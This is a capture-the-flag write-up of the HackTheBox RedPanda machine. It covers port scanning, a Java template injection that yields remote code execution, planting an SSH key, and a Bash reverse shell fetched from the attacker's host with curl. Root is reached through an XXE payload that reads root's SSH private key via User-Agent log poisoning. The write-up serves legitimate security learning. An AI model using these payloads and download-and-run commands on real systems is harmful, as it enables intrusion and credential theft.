Post

HackTheBox - RedPanda

Machine logo

Configuration

If you’re using your own machine like me, you have to access HTB network via OpenVPN:

1
sudo openvpn lab_access_file.ovpn

It is very useful to append /etc/hosts/ with ip address of the machine. It is useful to get subdomains and to not memorize the address every time.

1
echo '10.10.11.170  redpanda redpanda.htb' | sudo tee -a /etc/hosts

Reconnaissance

All ports scan

1
sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.11.170 --rate=500
1
2
Discovered open port 22/tcp on 10.10.11.170                                    
Discovered open port 8080/tcp on 10.10.11.170

nmap ports scan

1
sudo nmap -A -p 22,8080 redpanda
1
2
3
4
5
# The output is formatted by me
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have a ssh and http services here, HackTheBox is not about brute-forcing access, so let’s explore the web application.

Web application

Web app

At the start we check for technologies used in application. We can do it with whatweb or Wappalyzer.

1
whatweb redpanda.htb:8080
1
http://redpanda.htb:8080 [200 OK] Content-Language[en-US], Country[RESERVED][ZZ], HTML5, IP[10.10.11.170], Title[Red Panda Search | Made with Spring Boot]

As we can see, there is nothing interesting for us.

We have a search console at the root page.

We can input empty string, and the search console will return Greg red panda with a link to an author statistics.

Greg red panda

user.txt

Enumeration

Looks like the search console is filtering the input, but let’s intercept the request with BurpSuite. We start a proxy and sending request to the Repeater.

Trying to inject code

We can see that && symbols are working like something special, but we can’t see the result. Let’s check by pinging our machine. To do this we have to listen our machine traffic and filter it by ICMP. Our request is looking like this:

1
name=test&&ping -c 4 <YOUR_IP>

Search code injection haven't worked

Unluckly, it haven’t worked for us.

Looks like there is nothing more interesting for us, so let’s enumerate search console harder. We are trying to perform Template injection attack here by inputting ${7*7}, but the application bans it. Next, we try to input #{7*7} and there it is! Also, we have to url encode our request.

Template injection

There is a Server Side Template Injection (STTI) vulnerability. But if we try something more with # symbol, we’ll get nothing. We have to test other symbols with url encode. We try *{7*7} here.

Star is that symbol

Exploitation

Nice, now we have to identify template engine. Here we just have to try language specific injections. After some testing we find that the engine is Java. In this github repository we can find a tool to generate java payload and get Remote Code Exectuion. That tool also supports url encode. At first we try to read /etc/passwd.

Attempt to get users

We got it! We noted that there is a ssh service on the machine. Let’s try to add our ssh key woodenk authorized_keys. We generate a key with ssh-keygen. Now let’s upload our public RSA key. The server is filtering > symbol, so we cant just forward our input to a file. So, to do this we have to set up a webserver, then execute curl on machine with -o flag and change file permissions. We have to execute these commands on remote machine:

1
2
curl http://<YOUR_IP>:<YOUR_PORT>/id_rsa.pub -o /home/woodenk/.ssh/authorized_keys
chmod 600 /home/woodenk/.ssh/authorized_keys

If everything is good we are allowed to access the ssh with woodenk user.

1
2
ssh -i id_rsa woodenk@redpanda
cat user.txt
1
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # EDITED

root.txt

Exploring

I think HackTheBox developers have made this box not to ssh into it, because the user running the application has more privileges than ssh user, we can check it by id command. We will learn why it works like that later:

1
id
1
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)

So, with this we have to upload reverse shell on the machine. We prepare our reverse shell file with revshells.com, I’ve choosed simple Bash here. Then, we set up a simple web server, listener and execute these commands on the machine by converting them with ssti-payload:

1
2
curl http://<YOUR_IP>:<YOUR_PORT>/reverse_shell.sh -o /tmp/reverse_shell.sh
bash /tmp/revese_shell.sh

Now we have more privileges, let’s explore!

If we check processes, we can see why we’ve got more privileges than ssh user.

1
ps aux
1
2
3
4
5
6
7
8
... output ...
root         874  0.0  0.1   6812  3060 ?        Ss   Jul15   0:00 /usr/sbin/cron -f
root         875  0.0  0.1   8356  3384 ?        S    Jul15   0:00 /usr/sbin/CRON -f
root         879  0.0  0.0   2608   596 ?        Ss   Jul15   0:00 /bin/sh -c sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
root         880  0.0  0.2   9424  4640 ?        S    Jul15   0:00 sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
root         881  0.0  0.3  12172  7328 ?        Ss   Jul15   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
woodenk      888  0.7 12.4 3124848 251856 ?      Sl   Jul15   2:40 java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
...output ...

Web application is runned by root with setting up woodenk user and logs group. We note that cron and ssh are running on the machine. Let’s check if root login is allowed:

PermitRootLogin

Also, if we list /opt/ directory, we can find a script called cleanup.sh.

opt Directory

cleanup.sh Script

This script is removing files with jpg and xml extensions from all directories we can write. Let’s note it. Next, we know that the application is written in Java. We can try to search the source code of this application, we’ll find the file called MainController.java, let’s read it.

We can find mysql credentials in searchPanda function.

woodenk Credentials

They are also valid for ssh.

Valid credentials

We noted that files with jpg and xml extensions are sometimes cleared, we can see how application works with them:

Export XML

Files exporting need to either come from woodenk or damian. We can try to exploit XML External Entity (XXE) attack. You can learn about it at HackTricks.

In /opt/ directory we have an another application called LogParser, let’s check it’s source code. We will find how the app handles the metadata of images:

Metadata handler

Next, we can see how the app parses logs:

Log parser

We note that line is a string passed to a function. We can poison it by adding an extra || to our user agent and then providing a URI.

So, now we have all the information to perform our plan:

  1. We create a jpg with Artist tag setted up in metadata and putting it in home directory
  2. We create a XXE exploit with _creds.xml at the end of name and putting it in home directory. We set author tag to damian
  3. We navigate to any part of the website with modified User-Agent to trigger the application
  4. We read our *_creds.xml file

We noted that ssh is running, so we are trying to read /root/.ssh/id_rsa file.

Privilege escalation

Let’s start performing our plan to get root, we’ll get a random jpg and add the necessary details to it.

1
exiftool -Artist='../home/woodenk/vflamie' root.jpg

Our XXE exploit will look like that:

1
2
3
4
5
6
7
8
9
10
11
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///root/.ssh/id_rsa"> ]>
<credits>
  <author>damian</author>
  <image>
    <uri>/../../../../../../../home/woodenk/root.jpg</uri>
    <hello>&ent;</hello>
    <views>0</views>
  </image>
  <totalviews>0</totalviews>
</credits>

We save this file as vflamie_creds.xml.

Then, we intercept our request to the page with BurpSuite and modifying User-Agent with this string:

1
||/../../../../../../../home/woodenk/root.jpg

Finally, we re-read our xml file:

Success

It worked! Now we’re copying the key to file, and logging in!

1
2
3
chmod 600 id_rsa
ssh -i id_rsa root@redpanda
cat root.txt
1
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # EDITED

Conclusion

I don’t think it is an easy box, it was really hard to understand what to do here. But it is really cool feeling when your attempts finally starting work. I’ve learned a lot and enjoyed the box!

Thank you for reading, I hope it was useful for you ❤️

This post is licensed under CC BY 4.0 by the author.